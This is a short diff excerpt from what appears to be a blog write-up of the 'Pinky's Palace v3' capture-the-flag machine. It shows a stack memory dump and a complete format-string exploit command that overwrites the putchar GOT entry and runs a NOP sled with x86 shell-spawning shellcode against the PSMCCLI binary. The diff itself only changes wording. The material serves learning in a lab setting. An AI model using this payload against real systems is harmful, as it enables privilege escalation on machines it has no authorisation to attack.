Reboare/Lagrange/_posts/2018-05-28-pinkys-palace-v3.md

 0xbffffcc0: 0x9090909090909090 0x9090909090909090
 0xbffffcd0: 0x9090909090909090 0x9090909090909090
 ```
 We see that the address of the nopsled within the stack, so honestly, any address within it works fine but I ended up choosing `0xbffffc78`.
-We write this in two instances to the address `0x0804a01c` which is our putchar GOT address.
-One putchar is called after printf, an address to our shellcode will be in the GOT and executed.
+We write this in two instances to the address `0x0804a01c` which is our `putchar` GOT address.
+Once `putchar` is called after `printf`, an address to our shellcode will be in the GOT and executed.
 ```bash
 ./invoke /usr/local/bin/PSMCCLI $(python -c 'import sys; sys.stdout.write("\x1e\xa0\x04\x08\x1c\xa0\x04\x08%0049143x%119$hn%0015481x%120$hn"+"\x90"*961+"\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80")')
 ```